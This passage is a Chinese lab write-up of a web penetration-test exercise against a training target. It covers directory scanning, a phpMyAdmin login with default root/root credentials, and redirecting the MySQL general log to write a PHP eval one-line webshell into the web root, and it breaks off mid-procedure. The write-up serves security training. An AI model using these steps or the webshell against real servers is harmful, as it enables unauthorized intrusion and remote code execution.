网络安全综合实训

文章详细描述了web站点渗透测试的两个实例,包括目录扫描、漏洞利用(如phpmyadmin的任意文件包含漏洞)、getshell获取以及SQLserver的安全设置,还涉及了加密解密算法(如凯撒加密、DES、AES和RSA)和FTP密码嗅探技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验1 web站点渗透测试1

实验准备

1、根据平台提供的靶机网址访问网站首页(10.0.26.10),首页界面如下图所示。

实验过程

2、使用目录扫描器御剑,对靶机站点进行目录扫描。发现目标站点下存在phpmyadmin目录以及一个info.php的文件。

3、访问info.php文件之后,发现其内容为php探针。通过php探针的信息,判断出该站点使用phpstudy搭建, 使 phpstudy 。且获得网 “C:\phpStudy\PHPTutorial\WWW”3


4、访问phpmyadmin目录,使用phpstudymysql的默认密码(root/root)进行登录尝试,发现登录成功


5、因为以root权限登录了phpmyadmin且在步骤3已经通过php探针获取到了网站的绝对路径,所以接下来可以尝试利用日志文件来进行getshell。首先在sql处执行“SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径


6、由上图可知,“set global general_log = "ON";”开启mysql日志“setglobalgeneral_log_file='C://phpStudy//PHPTutorial//WWW//shell.php';”将日志文件的存储路径改为站点根目录下的shell.php 文件。

7、之后再执行sql语句“select ‘<?php @eval($_POST[1]);?>’”,向日志文件中写入php一句话木马。

8、之后在浏览器中访问mysql日志文件,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值